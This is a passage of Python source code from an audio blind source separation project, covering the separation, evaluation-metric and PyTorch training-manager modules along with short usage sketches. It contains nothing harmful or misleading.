sdrs[indices_babycry_mix, 0].mean(), sdrs[indices_babycry_mix, 0].std(),
np.median(sdrs[indices_babycry_mix, 0]),
sirs[indices_babycry_mix, 0].mean(), sirs[indices_babycry_mix, 0].std(),
np.median(sirs[indices_babycry_mix, 0]),
sars[indices_babycry_mix, 0].mean(), sars[indices_babycry_mix, 0].std(),
np.median(sars[indices_babycry_mix, 0])))
print('Babycry only\nSDR: ' + format_string.format(
sdrs[indices_babycry_only, 0].mean(), sdrs[indices_babycry_only, 0].std(),
np.median(sdrs[indices_babycry_only, 0]),
sirs[indices_babycry_only, 0].mean(), sirs[indices_babycry_only, 0].std(),
np.median(sirs[indices_babycry_only, 0]),
sars[indices_babycry_only, 0].mean(), sars[indices_babycry_only, 0].std(),
np.median(sars[indices_babycry_only, 0])))
print('Glassbreak mixes\nSDR: ' + format_string.format(
sdrs[indices_glassbreak_mix, 1].mean(), sdrs[indices_glassbreak_mix, 1].std(),
np.median(sdrs[indices_glassbreak_mix, 1]),
sirs[indices_glassbreak_mix, 1].mean(), sirs[indices_glassbreak_mix, 1].std(),
np.median(sirs[indices_glassbreak_mix, 1]),
sars[indices_glassbreak_mix, 1].mean(), sars[indices_glassbreak_mix, 1].std(),
np.median(sars[indices_glassbreak_mix, 1])))
print('Glassbreak only\nSDR: ' + format_string.format(
sdrs[indices_glassbreak_only, 1].mean(), sdrs[indices_glassbreak_only, 1].std(),
np.median(sdrs[indices_glassbreak_only, 1]),
sirs[indices_glassbreak_only, 1].mean(), sirs[indices_glassbreak_only, 1].std(),
np.median(sirs[indices_glassbreak_only, 1]),
sars[indices_glassbreak_only, 1].mean(), sars[indices_glassbreak_only, 1].std(),
np.median(sars[indices_glassbreak_only, 1])))
print('Gunshot mixes\nSDR: ' + format_string.format(
sdrs[indices_gunshot_mix, 2].mean(), sdrs[indices_gunshot_mix, 2].std(),
np.median(sdrs[indices_gunshot_mix, 2]),
sirs[indices_gunshot_mix, 2].mean(), sirs[indices_gunshot_mix, 2].std(),
np.median(sirs[indices_gunshot_mix, 2]),
sars[indices_gunshot_mix, 2].mean(), sars[indices_gunshot_mix, 2].std(),
np.median(sars[indices_gunshot_mix, 2])))
print('Gunshot only\nSDR: ' + format_string.format(
sdrs[indices_gunshot_only, 2].mean(), sdrs[indices_gunshot_only, 2].std(),
np.median(sdrs[indices_gunshot_only, 2]),
sirs[indices_gunshot_only, 2].mean(), sirs[indices_gunshot_only, 2].std(),
np.median(sirs[indices_gunshot_only, 2]),
sars[indices_gunshot_only, 2].mean(), sars[indices_gunshot_only, 2].std(),
np.median(sars[indices_gunshot_only, 2])))
if __name__ == '__main__':
main()
```
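A minimal sketch (not part of the repository) of how the custom `MelScale` above is meant to be used: register it once, then request the `'mel'` scale by name on any matplotlib axis, mirroring what `main()` does. The dummy data is made up for illustration, and the import assumes the script above is importable as a module.
```python
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import scale as mscale
from separation_examples_and_compute_metrics import MelScale  # assumed import path

mscale.register_scale(MelScale)  # make the 'mel' scale name available

# Dummy spectrogram-like data: 64 mel bands, 100 time frames, frequency axis in kHz
data = np.random.rand(64, 100)
freqs_khz = np.linspace(0.0, 8.0, 64)

fig, ax = plt.subplots(figsize=(5, 3))
ax.pcolormesh(np.arange(data.shape[1]), freqs_khz, data, cmap='magma', shading='auto')
ax.set_yscale('mel')  # the name registered by MelScale
plt.locator_params(axis='y', nbins=4)
fig.savefig('mel_scale_demo.png')
```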
#### File: 4p0pt0Z/Audio_blind_source_separation/separator.py
```python
import torch
import librosa
import numpy as np
import mir_eval
import separation_model as md
import data_set as dts
from shutil import copyfile
import os
class AudioSeparator:
    r"""Implements a framework for using a SeparationModel to produce separated sources for all files in the
    validation set and measure the separation performance in terms of signal-to-distortion ratio (SDR),
    signal-to-interference ratio (SIR) and signal-to-artifact ratio (SAR).
"""
@classmethod
def default_config(cls):
        r"""Get the required parameters for instantiating an AudioSeparator
        The configuration parameters for the model and the AudioDataSet are saved in the model checkpoint. All we
        need for instantiation is the path to the checkpoint.
The path to the folder to use for saving the separated audio tracks is also exposed.
Returns:
dict containing the required parameters
"""
config = {
"checkpoint_path": "", # path to model checkpoint
"separated_audio_folder": "" # path to folder where to save the separated audio tracks.
}
return config
def __init__(self, data_set, model, config):
r"""Constructor. Receives the AudioDataSet and the Model and stores them as class members.
Note: The received data_set features should not be scaled or centered.
Args:
data_set (AudioDataSet): The data set with the mixtures to separate
model (SeparationModel): The separation model for performing separation
config (dict): Configuration dictionary with parameters for the model, dataset and self.
"""
self.config = config
self.data_set = data_set
# Normalize or standardize the features, to have them ready to use as model input
self.data_set.shift_and_scale(self.config["shift"], self.config["scaling"])
self.model = model
self.model.eval()
self.device = torch.device("cpu") if not self.config["use_gpu"] \
else torch.device("cuda:" + str(self.config["gpu_no"]))
@classmethod
def from_checkpoint(cls, config, which_data_set="test"):
r"""Instantiate an AudioSeparator from a model checkpoint.
Loads the model from its checkpoint.
The checkpoint also contains the configuration dictionary required to create the validation set related
to the set used to train the model.
Args:
config (dict): Configuration dictionary with the parameters in defined in 'default_config()'
            which_data_set (str): Identifier of the set type for the 'split' method of the AudioDataSet. 'train',
'test' or 'val'
Returns:
AudioSeparator using the model loaded from the checkpoint path in 'config'
"""
# Load the checkpoint
filename = config["checkpoint_path"]
if not os.path.isfile(filename):
raise ValueError("File " + filename + " is not a valid file.")
print("Loading model ...'{}'".format(filename))
state = torch.load(filename, 'cpu')
        # Get the configuration parameters used during the training of the model.
train_config = state["config"]
# Update those parameters with the AudioSeparator parameters.
train_config.update(config)
# Build the data set containing the audio to separate.
val_set = dts.find_data_set_class(train_config["data_set_type"]).split(train_config, which_data_set)
# Build the SeparationModel and load its parameters
model = md.SeparationModel(train_config, val_set.features_shape(), val_set.n_classes())
model.load_state_dict(state["model_state_dict"])
# Build the AudioSeparator
return cls(val_set, model, train_config)
def separate_spectrogram(self, masks, features, features_idx):
r"""Apply masks to models input features to generate a spectrogram for each audio source.
There are many ways to use separation masks to produce spectrograms for each sources in the input features.
This function does the following:
- Rescale the masks to the shape of the SeparationModel input
(this is only useful if the MaskModel in the SeparationModel does not preserve the shape of its input
with padding)
- Shift the features to [0, +inf[, apply the mask and shift back.
(This is because the features can have negative values, and we want a value of 0 in the mask to
correspond to the lowest possible energy)
            - The previous step provides us with 'masked features': these features should correspond to separated
              sources. The last step is to convert these features (scaled and centered log-Mel-spectrogram,
              PCEN, ...) back to a 'spectrogram' representation that can be converted back to audio with inverse STFT.
        Note: It has been found experimentally that applying the masks at the 'features' level gives worse results than
              converting the masks to the 'spectrogram' representation and applying them directly to the mixture
              spectrogram, because converting the features back to the spectrogram scale often implies taking the
              exponential of the features, which strongly amplifies the noise.
              The latter processing is performed by 'separate_spectrogram_in_lin_scale()'.
Args:
masks (torch.Tensor): Shape: [n_class, ~freq, ~time]. The masks produced by the separation model.
features (torch.Tensor): Shape [channel, freq, time]. The input features to the separation model.
features_idx (int): index of the features in data_set.features
Returns:
Spectrogram of the sources separated by the masks. shape: [n_sources, channel=1, Frequency, Time]
"""
# resize the masks to the size of the features (shape: [n_masks, channel, freq, time]
# This does something only if the masks have different shape than features (if MaskModel doesn't preserve shape)
masks = torch.nn.functional.interpolate(masks.unsqueeze(1),
size=(features.shape[1], features.shape[2]),
mode='bilinear',
align_corners=False)
# Multiply each mask with the features (shape: [n_masks, channel, features.shape[0], features.shape[1]]
shift = features.abs().max()
spectrograms = masks * (features + shift) - shift
# Undo the feature scaling and centering
self.data_set.rescale_to_initial(spectrograms, self.config["shift"], self.config["scaling"])
# From Log Mel spectrogram or PCEN to STFT magnitude (energy spectrogram)
return self.data_set.features_to_stft_magnitudes(spectrograms.cpu().numpy(), features_idx)
def separate_spectrogram_in_lin_scale(self, masks, features_shape, mixture_spectrogram):
r"""Apply masks to the mixture spectrogram to generate spectrograms for each separated sources.
The masks received in argument have the shape of the output of the MaskModel. In this function,
these masks will first be converted to the shape of the mixture energy spectrogram (inverse Mel scaling)
and then be directly applied to the mixture spectrogram.
Args:
masks (torch.tensor): Shape: [n_class, ~freq, ~time] The masks produced by the separation model
features_shape (torch.tensor.shape): Shape of the input features to the separation model.
mixture_spectrogram (np.ndarray): shape: [Frequency, Time] Mixture spectrogram.
Returns:
Spectrogram of the sources separated by the masks. shape: [n_sources, channel=1, Frequency, Time]
"""
# resize the masks to the size of the features (shape: [n_masks, channel, freq, time]
# This does something only if the masks have different shape than features (if MaskModel doesn't preserve shape)
masks = torch.nn.functional.interpolate(masks.unsqueeze(1),
size=(features_shape[1], features_shape[2]),
mode='bilinear',
align_corners=False)
# If Mel spectrogram were used as features: reverse Mel-scaling
# Here we use the same inverse processing as in the implementation of
# <NAME> et al. "A joint-separation-classification model for sound event detection of weakly-labelled
        # data"; In: CoRR abs/1711.03037 (2017). arXiv: 1711.03037 URL: http://arxiv.org/abs/1711.03037
if self.config['feature_type'] != 'spectrogram':
masks = np.asarray([np.transpose(
self.data_set.mel_filterbank / (np.sum(self.data_set.mel_filterbank, axis=0) + 1e-8)) @ mask.numpy()
for mask in masks.squeeze()])
# Apply the masks to the mixture spectrogram. Mask.shape: [n_sources, channel=1, Frequency, Time]
# mixture_spectrogram.shape: [Frequency, Time]
# output.shape: [n_sources, channel=1, Frequency, Time]
return masks * mixture_spectrogram
def spectrogram_to_audio(self, spectrogram, phase):
r"""Compute waveform from spectrogram using inverse short-time Fourier transform.
Wrapper to call the istft function from the AudioDataSet class that performs the ISTFT with the
parameters corresponding to the STFT.
Args:
spectrogram (np.ndarray): shape: [Frequency, Time]. Magnitude of STFT result
phase (np.ndarray): shape: [Frequency, Time]. Phase of STFT result
Returns:
audio waveform. (1D np.ndarray)
"""
return self.data_set.istft(spectrogram * phase)
def save_separated_audio(self, audios, filename):
r"""Save the audios tracks in audios, in a subfolder of self.config['separated_audio_folder'].
'audios' should be the sources separated by the SeparationModel for the audio mixture saved in 'filename'.
        The separated tracks are saved in a folder with the same name as their corresponding mixture.
The mixture is also copied inside the folder.
Args:
audios (np.ndarray): shape: [n_sources, time]. Audio waveforms of the separated sources
filename (str): Name of the file containing the audio mixture.
"""
# Create folder with mixture name
folder_path = os.path.join(self.config["separated_audio_folder"], os.path.splitext(filename)[0])
os.makedirs(folder_path)
# Save each separated source
for class_idx, audio in enumerate(audios):
librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',
audio.T,
sr=self.data_set.config["sampling_rate"])
# Also copy the mixture in the folder
copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, "original_mix.wav"))
def separate(self, separation_method='in_lin'):
r"""Run separation with self.model for all the files in self.data_set and save the separated sources.
Args:
            separation_method (str): Identifier to choose how the masks are applied: at the feature level
                                     ('in_log', uses 'separate_spectrogram') or at the energy spectrogram
                                     level ('in_lin', uses 'separate_spectrogram_in_lin_scale').
                                     Advised: 'in_lin'
"""
# Check if the output folder exists, if not creates it, otherwise inform user and stop execution
if not os.path.exists(self.config["separated_audio_folder"]):
os.makedirs(self.config["separated_audio_folder"])
else:
if os.listdir(self.config["separated_audio_folder"]): # if folder is not empty
raise ValueError('Output folders already exist !')
self.model.to(self.device)
self.model.eval()
self.data_set.to(self.device)
# Loop over all the files in the dataset.
for idx in range(self.data_set.__len__()):
# Get the features
features = self.data_set.get_features(idx)
# Get the separation masks
_, masks = self.model(features.unsqueeze(0)) # (add batch dimension)
masks = masks.detach().squeeze() # move "mask" dim in first position
# Apply the masks
if separation_method == 'in_log':
spectrograms = self.separate_spectrogram(masks, features, idx)
elif separation_method == 'in_lin':
spectrograms = self.separate_spectrogram_in_lin_scale(masks, features.shape,
self.data_set.get_magnitude(idx))
else:
raise ValueError('Separation method ' + separation_method + ' is not available.')
# Get the separated audio and save
audios = [self.spectrogram_to_audio(spectrogram, self.data_set.get_phase(idx)) for spectrogram in spectrograms]
self.save_separated_audio(audios, self.data_set.filenames[idx])
def evaluate_separation(self, indices=None):
r"""Compute separation metrics using the separated sources in self.config['separated_audio_folder']
Assuming 'separate()' has been previously called: the separated sources for all the audio files in
self.data_set are stored in self.config['separated_audio_folder'].
This function loads the separated sources and the ground-truth sources to compute separation metrics.
Separation metrics used here are:
- Signal to Distortion ratio (SDR)
- Signal to Interference ratio (SIR)
- Signal to Artifact ratio (SAR)
Those are computed using the mir_eval library.
        Note: These estimators are not very reliable for assessing separation quality. Unfortunately they are the
        most commonly used in the literature. Here we use the 'bss_eval_images' function, which does use a filtered
        version of the ground-truth sources, but also does not allow for scale changes.
        For a discussion of the quality of these measures, see:
<NAME> et al. (2018). "SDR - half-baked or well done?". CoRR, abs/1811.02508.
Args:
            indices (np.ndarray): If passed, compute separation metrics only for the files at the given indices.
                                  Otherwise: process the entire data set
Returns:
sdr, sir, sar: np.ndarray of shape [n_files, n_sources]
"""
        # if indices is passed: evaluate separation only for the files at the given indices. Otherwise: do the entire data set
if indices is None:
indices = np.arange(self.data_set.__len__())
sdr = np.zeros((indices.shape[0], len(self.data_set.classes)))
sir = np.zeros((indices.shape[0], len(self.data_set.classes)))
sar = np.zeros((indices.shape[0], len(self.data_set.classes)))
for idx in indices:
# Load separated sources
# Take care of sorting the sources here and in data_set class in the same way to have consistent labels
# Take care not to load the 'original_mix' file which is the mixture file.
separated_sources = np.asarray([self.data_set.load_audio(os.path.join(self.config["separated_audio_folder"],
os.path.splitext(
self.data_set.filenames[idx])[0],
filename))
                                            for filename in sorted(  # sort in the same order as in the data_set class
os.listdir(os.path.join(self.config["separated_audio_folder"],
os.path.splitext(self.data_set.filenames[idx])[0])))
if 'mix' not in filename]) # original mix is copied over with sep. sources
# Get the ground-truth sources from self.data_set
reference_sources = self.data_set.load_audio_source_files(idx)
# Crop to length of reconstructed signal (because last non-complete frame of the stft is dropped)
# Add small offset to avoid having sources always 0 (mir_eval does not like that)
reference_sources = reference_sources[:, :separated_sources.shape[1]] + 1e-15
sdr[idx], _, sir[idx], sar[idx], _ = mir_eval.separation.bss_eval_images(reference_sources,
separated_sources,
compute_permutation=False)
return sdr, sir, sar
```
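A minimal usage sketch (not part of the repository) for `AudioSeparator`: load a trained model from its checkpoint, separate every file of the chosen split, then compute the separation metrics. The paths below are placeholders.
```python
from separator import AudioSeparator

# Placeholder paths -- point these to a real checkpoint and an empty output folder
config = AudioSeparator.default_config()
config["checkpoint_path"] = "checkpoints/my_model.ckpt"
config["separated_audio_folder"] = "separated/my_model"

# Build the separator on the validation split and apply the masks on the energy spectrogram
separator = AudioSeparator.from_checkpoint(config, which_data_set="val")
separator.separate(separation_method="in_lin")

# SDR / SIR / SAR for every file in the split, shape [n_files, n_sources]
sdr, sir, sar = separator.evaluate_separation()
print(sdr.mean(axis=0), sir.mean(axis=0), sar.mean(axis=0))
```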
#### File: 4p0pt0Z/Audio_blind_source_separation/train.py
```python
import torch
import numpy as np
import sklearn.metrics as skmetrics
import separation_model as md
import data_set as dts
import os
class TrainingManager:
r"""Implements a training and evaluation framework for the audio separation models.
    This class brings together the different elements required to train an audio separation model:
        - the data set (training, testing and validation)
        - the model
        - the optimizer
    It provides methods to monitor the model's training performance, and to easily save and re-load a model for evaluation.
"""
@classmethod
def default_config(cls):
r"""Provides a dictionary with the tunable training parameters."""
        config = {
            "data_set_type": "",  # Identifier to pass to dts.find_data_set_class to get the class of the data sets.
"batch_size": 32, # Size of mini-batches during training
# Number of worker to use for the data loaders.
# 0 means the loading happens in the same thread as the main program runs. This is fine if the training
# data is already loaded in RAM.
"n_loaders": 0,
"use_gpu": True,
"gpu_no": 0, # If multiple gpus are available, chose one
"metric": "", # Accuracy, F-score, MCC, etc... See available in 'compute_metric()'
"average": "weighted", # Average argument of the sklearn metrics: how to aggregate results across classes
            # Some metrics only take binary input (e.g. accuracy: predictions need to be 1 or 0)
# Can be either a list with 1 value, in which case the same threshold is used for all classes
# or a list of values, one for each class.
"threshold": [0.5],
# Loss function to use: BCE, multilabelSoftMarginLoss, etc ... (see '__init__()')
"loss_f": "BCE",
# Weight to give to the L1 loss applied to the masks.
"l1_loss_lambda": 0.0,
# Optimizer parameters
"optimizer": "Adam",
"learning_rate": 0.0001,
"weight_decay": 0.00001,
# Learning rate scheduler parameters
"scheduler_type": "", # see '__init__' for supported scheduler types
"scheduler_step_size": 0, # Used with StepLR: number of epoch for each step
"scheduler_gamma": 0.0, # Used with stepLR, multiStepLR and reduceLROnPlateau: learning rate multiplier
"scheduler_milestones": [0.0], # Used with MultiStepLR: epoch number at which to change the learning rate
"scheduler_patience": 0, # Used with ReduceLROnPlateau: number of epochs to wait before reducing lr
"epoch_idx": 0, # Stores the current epoch number
"n_epochs": 0, # Number of epoch to train
"test_every": 1, # Evaluate model with an epoch on test set every this amount of training epoch
"save_path": "", # path to save the model and manager settings into a checkpoint file.
"checkpoint_path": "" # When evaluating a saved model: path to the checkpoint.
}
return config
def __init__(self, config):
r"""Constructor. Instantiates the data sets, the model, the optimizer, scheduler, loss function.
Args:
config (dict): Configuration dictionary with tunable training parameters
"""
self.config = dict(config)
self.device = torch.device("cpu") if not self.config["use_gpu"] \
else torch.device("cuda:" + str(self.config["gpu_no"]))
# Instantiate the data sets.
self.train_set, self.test_set, self.val_set = \
dts.find_data_set_class(self.config["data_set_type"]).split(self.config)
# Scale the features
self.shift_scale_data_sets()
# Instantiate the model
self.model = md.SeparationModel(config, self.train_set.features_shape(), self.train_set.n_classes())
# Optimizer
if self.config["optimizer"] == "Adam":
self.optimizer = torch.optim.Adam(self.model.parameters(),
lr=self.config["learning_rate"],
weight_decay=self.config["weight_decay"])
else:
raise NotImplementedError('The optimizer ' + self.config["optimizer"] + ' is not available.')
# Learning rate scheduler
if self.config["scheduler_type"] == "stepLR":
# Reduce lr after every step_size number of epoch
self.scheduler = torch.optim.lr_scheduler.StepLR(optimizer=self.optimizer,
step_size=self.config["scheduler_step_size"],
gamma=self.config["scheduler_gamma"])
elif self.config["scheduler_type"] == "multiStepLR":
# Reduce the learning rate when the epochs in milestones are reached
self.scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer=self.optimizer,
milestones=self.config["scheduler_milestones"],
gamma=self.config["scheduler_gamma"])
elif self.config["scheduler_type"] == "reduceLROnPlateau":
# Reduce learning rate if the loss value does not decrease during 'patience' number of epoch
self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=self.optimizer,
patience=self.config["scheduler_patience"],
factor=self.config["scheduler_gamma"])
elif not self.config["scheduler_type"]:
# Do not use any scheduler
self.scheduler = None
else:
raise NotImplementedError("Learning rate scheduler " + self.config["scheduler_type"] + " is not available.")
# Loss function
if self.config["loss_f"] == "BCE":
self.loss_f = torch.nn.BCELoss()
elif self.config["loss_f"] == "MultiLabelSoftMarginLoss":
self.loss_f = torch.nn.MultiLabelSoftMarginLoss()
else:
raise NotImplementedError("Loss function " + self.config["loss_f"] + " is not available.")
# l1 loss function, to penalize masks activations when they should be 0.
self.l1_loss_f = torch.nn.L1Loss()
self.l1_loss_lambda = self.config["l1_loss_lambda"]
# list storing loss function and metric values for each epoch
self.train_losses, self.test_losses, self.val_losses = [], [], []
self.train_metrics, self.test_metrics, self.val_metrics = [], [], []
# List to save the trainable pcen parameters at each epoch (if any)
self.pcen_parameters = []
def save_state(self):
r"""Saves the model, training metrics and losses, trainable PCEN parameters and configuration to checkpoint.
Loading this checkpoint should be enough to resume the training or evaluate the model, or investigate
training behaviour of PCEN parameters.
"""
        state = {"model_state_dict": self.model.state_dict(),
                 "optimizer_state_dict": self.optimizer.state_dict(),
                 "config": self.config,
                 "train_losses": self.train_losses, "train_metrics": self.train_metrics,
                 "test_losses": self.test_losses, "test_metrics": self.test_metrics,
                 "val_losses": self.val_losses, "val_metrics": self.val_metrics,
"pcen_parameters": self.pcen_parameters}
torch.save(state, self.config["save_path"])
def save_metrics_and_losses(self):
r"""Save the training metrics and PCEN parameters to checkpoint, but do not over-write the saved model."""
try:
state = torch.load(self.config["save_path"], 'cpu')
except FileNotFoundError:
print("Could not find saved model, saving metrics and losses ...")
state = {}
state["train_losses"], state["test_losses"], state["val_losses"] = \
self.train_losses, self.test_losses, self.val_losses
state["train_metrics"], state["test_metrics"], state["val_metrics"] = \
self.train_metrics, self.test_metrics, self.val_metrics
state["pcen_parameters"] = self.pcen_parameters # .detach().clone()
torch.save(state, self.config["save_path"])
@classmethod
def from_checkpoint(cls, filename, config_update=None):
r"""Build a training manager from checkpoint
        Build a training manager with its data sets and model from a checkpoint. This allows continuing the
        training of a model, or evaluating a saved model.
Args:
filename (str): path to the checkpoint file
            config_update (dict): Optionally, the training parameters can be updated when resuming training.
Returns:
TrainingManager with model loaded from checkpoint.
"""
if not os.path.isfile(filename):
raise ValueError("File " + filename + " is not a valid file.")
print("Loading from checkpoint '{}'".format(filename))
# Load the checkpoint dictionary
state = torch.load(filename, 'cpu')
if config_update is not None: # Update dict if we have updated parameters
state["config"].update(config_update)
# Instantiate manager
manager = cls(state["config"])
# Load saved losses and metrics
manager.train_losses, manager.test_losses, manager.val_losses = \
state["train_losses"], state["test_losses"], state["val_losses"]
manager.train_metrics, manager.test_metrics, manager.val_metrics = \
state["train_metrics"], state["test_metrics"], state["val_metrics"]
# Load model parameters
manager.model.load_state_dict(state["model_state_dict"])
# Load optimizer parameters.
manager.optimizer.load_state_dict(state["optimizer_state_dict"])
# Move model and optimizer to device
manager.model.to(manager.device)
for state in manager.optimizer.state.values(): # due to pytorch bug, need to loop manually for optimizer params
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.to(manager.device)
return manager
def shift_scale_data_sets(self):
r"""Shift and scale the features of all sets with statistics computed on the training set."""
shift, scaling = self.train_set.compute_shift_and_scaling()
# Shift and scaling parameters are saved inside the config. We might need them.
self.config["shift"], self.config["scaling"] = shift, scaling
self.train_set.shift_and_scale(shift, scaling)
self.test_set.shift_and_scale(shift, scaling)
self.val_set.shift_and_scale(shift, scaling)
def compute_metric(self, labels, predictions, average=None):
r"""Compute a classification metric score.
Args:
labels (np.ndarray): Groundtruth labels
predictions (np.ndarray): Models predictions
            average (str): sklearn 'average' argument: how to aggregate the metric score across classes
If the parameter is not passed: will use the value in self.config
Returns:
metric value
"""
if average is None:
average = self.config["average"] if self.config["average"].lower() != "none" else None
# If metric is "area under curve" based, no need for threshold. Compute metric
if self.config["metric"] == "roc_auc_score":
return skmetrics.roc_auc_score(labels, predictions, average=average)
else:
# Apply threshold:
# Only 1 threshold available: use the same for all classes
if len(self.config["threshold"]) == 1:
predictions[predictions >= self.config["threshold"][0]] = 1
predictions[predictions < self.config["threshold"][0]] = 0
            # Several thresholds are passed, but not the same number as the number of classes: raise Error
            elif len(self.config["threshold"]) != predictions.shape[1]:
                raise ValueError(
                    "Number of thresholds {}".format(len(self.config["threshold"])) + " and classes {}".format(
                        predictions.shape[1]) + " are not matching.")
            # Several thresholds are passed: use one threshold per class
else:
for idx in range(len(self.config["threshold"])):
predictions[:, idx][predictions[:, idx] >= self.config["threshold"][idx]] = 1
predictions[:, idx][predictions[:, idx] < self.config["threshold"][idx]] = 0
# Compute metric
if self.config["metric"] == "accuracy":
return skmetrics.accuracy_score(labels, predictions)
elif self.config["metric"] == "f1-score":
return skmetrics.f1_score(labels, predictions, average=average)
elif self.config["metric"] == "matthews_corrcoef":
return skmetrics.matthews_corrcoef(labels, predictions)
elif self.config["metric"] == "precision":
return skmetrics.precision_score(labels, predictions, average=average)
elif self.config["metric"] == "average_precision_score":
return skmetrics.average_precision_score(labels, predictions, average=average)
elif self.config["metric"] == "recall":
return skmetrics.recall_score(labels, predictions, average=average)
def print_epoch(self, loss_value, metric_value, set_type, epoch_idx="\b"):
r"""Pretty print of the loss and metric value per epoch
Args:
loss_value (float): Loss function value
metric_value (float): Metric value
set_type (str): 'Training', 'Testing' or 'Validation'
            epoch_idx (int): Number of epochs since the beginning of training
"""
print("Epoch {} on {} set - ".format(epoch_idx, set_type) + self.config["loss_f"]
+ " loss: {:.4f} - ".format(loss_value), end='', flush=True)
if self.config["average"] != "None":
print(self.config["average"] + " ", end='', flush=True)
print(self.config["metric"] + ": ", end='', flush=True)
if isinstance(metric_value, np.ndarray):
print(["{:.4f}".format(value) for value in metric_value], flush=True)
else:
            print("{:.4f}".format(metric_value), flush=True)
def train(self):
r"""Training loop"""
# Move stuff to where it should be and make sure that the returned batches are on 'self.device'
self.model.to(self.device)
self.train_set.to(self.device)
# Pass the data set to the torch.data.DataLoader wrapper (for shuffling, and potentially parallel execution)
train_loader = torch.utils.data.DataLoader(self.train_set, batch_size=self.config["batch_size"], shuffle=True,
num_workers=self.config["n_loaders"])
max_metric = -np.inf # Record best metric on the testing set
self.save_metrics_and_losses()
for idx in range(1, self.config["n_epochs"] + 1): # Loop over the training epochs
self.config["epoch_idx"] += 1
            # Keep all predictions, labels and losses of the processed examples per epoch to compute per-epoch averages.
all_predictions = []
all_labels = []
losses = []
self.model.train()
for batch_idx, (features, labels) in enumerate(train_loader): # Loop over the batches in the epoch
self.optimizer.zero_grad()
predictions, masks = self.model(features)
loss = self.loss_f(predictions, labels) # Classification loss
# L1 loss on the mask activation, to penalize the activations in a mask when the class was not present.
l1_loss = self.l1_loss_f(masks[1 - labels.to(torch.uint8)],
torch.zeros(masks[1 - labels.to(torch.uint8)].shape).to(masks))
# Take linear combination of the 2 losses for updating the weights
((1 - self.l1_loss_lambda) * loss + self.l1_loss_lambda * l1_loss).backward()
self.optimizer.step()
all_predictions.append(predictions.detach().cpu().numpy())
all_labels.append(labels.detach().cpu().numpy())
losses.append(((1 - self.l1_loss_lambda) * loss + self.l1_loss_lambda * l1_loss).item())
# End of epoch on training set.
            if self.config["scheduler_type"] == "reduceLROnPlateau":
self.scheduler.step(np.mean(losses))
elif self.scheduler is not None:
self.scheduler.step()
# Compute epoch averages
            all_predictions = np.concatenate(all_predictions, axis=0)  # concatenate the per-batch prediction arrays
all_labels = np.concatenate(all_labels, axis=0)
self.train_losses.append(np.mean(losses))
self.train_metrics.append(self.compute_metric(all_labels, all_predictions))
self.print_epoch(loss_value=self.train_losses[-1], metric_value=self.train_metrics[-1],
set_type="training", epoch_idx=self.config["epoch_idx"])
# Save the trainable PCEN parameters (if any)
if hasattr(self.model, 'pcen'):
if self.model.pcen is not None:
self.pcen_parameters.append({key: torch.tensor(value, requires_grad=False)
for key, value in self.model.pcen.state_dict().items()})
# Monitor performances on testing set every once in a while. If best score is achieved: save model
if idx % self.config["test_every"] == 0:
test_loss, test_metric, weighted_test_metric = self.evaluate(self.test_set, special_average='weighted')
self.test_losses.append(test_loss)
self.test_metrics.append(test_metric)
self.print_epoch(loss_value=test_loss, metric_value=test_metric, set_type="testing")
                if weighted_test_metric > max_metric:  # for per-class metrics, compare using the weighted average
                    print("Saving best model...")
                    self.save_state()
                    max_metric = weighted_test_metric
print("Loading best model for evaluation on validation set... ")
state = torch.load(self.config["save_path"], 'cpu')
self.model.load_state_dict(state["model_state_dict"])
self.model.to(self.device)
val_loss, val_metric = self.evaluate(self.val_set)
self.val_losses.append(val_loss)
self.val_metrics.append(val_metric)
self.print_epoch(loss_value=val_loss, metric_value=val_metric, set_type="validation")
self.save_metrics_and_losses()
        # In case the metric was not a good indicator and we still would like to save the last epoch model.
        print("Saving model at last epoch...")
        original_save_path = self.config['save_path']
        self.config['save_path'] = os.path.splitext(original_save_path)[0] + '_final' + '.ckpt'
        self.save_state()
        # Put back save path
        self.config['save_path'] = original_save_path
def evaluate(self, data_set, special_average=None):
r"""Run the model through an epoch of a dataset, to compute loss function and metric averages.
Args:
data_set (torch.data.Dataset): Dataset to evaluate the model
            special_average (str): sklearn 'average' argument: how to aggregate the metric score across classes
                                   The metric score is computed using the 'average' parameter in self.config - and
                                   also using this special average.
                                   This is used in the training loop: in order to know if the model performs best
                                   overall, a single-number metric score needs to be calculated even if the
                                   monitored metric is computed per class.
        Returns:
            (Average loss, Average score) on the input data set if 'special_average' is None, otherwise
            (Average loss, Average score, Special-average score) on the input data set.
"""
# Move model and data set to device
self.model.to(self.device)
data_loader = torch.utils.data.DataLoader(data_set, batch_size=self.config["batch_size"], shuffle=True,
num_workers=self.config["n_loaders"])
data_loader.dataset.to(self.device)
# List to aggregate the loss and metric values over the batches
all_predictions = []
all_labels = []
losses = []
self.model.eval()
with torch.no_grad():
for (features, labels) in data_loader: # Loop over the batches in the epoch
predictions, masks = self.model(features)
loss = self.loss_f(predictions, labels)
losses.append(loss.item())
all_predictions.append(predictions.detach().cpu().numpy())
all_labels.append(labels.detach().cpu().numpy())
        all_predictions = np.concatenate(all_predictions, axis=0)  # concatenate the per-batch prediction arrays
all_labels = np.concatenate(all_labels, axis=0)
if special_average is None:
return np.mean(losses), self.compute_metric(all_labels, all_predictions)
else:
return np.mean(losses), \
self.compute_metric(all_labels, all_predictions), \
self.compute_metric(all_labels, all_predictions, special_average)
``` |
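A minimal sketch (not part of the repository) of how a TrainingManager is typically driven. The data-set identifier and paths are placeholders, and a real run would also need the data-set and SeparationModel specific configuration keys, which are omitted here.
```python
from train import TrainingManager

config = TrainingManager.default_config()
config.update({
    "data_set_type": "MyDataSet",   # hypothetical identifier resolved by dts.find_data_set_class
    "metric": "roc_auc_score",
    "average": "weighted",
    "loss_f": "BCE",
    "optimizer": "Adam",
    "learning_rate": 1e-4,
    "n_epochs": 50,
    "test_every": 1,
    "save_path": "checkpoints/my_model.ckpt",
})
# NOTE: the data set and SeparationModel classes expect their own config keys as well (omitted here).

manager = TrainingManager(config)
manager.train()

# Resume or evaluate later from the saved checkpoint, optionally overriding parameters
manager = TrainingManager.from_checkpoint("checkpoints/my_model.ckpt", config_update={"n_epochs": 10})
val_loss, val_metric = manager.evaluate(manager.val_set)
```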
{
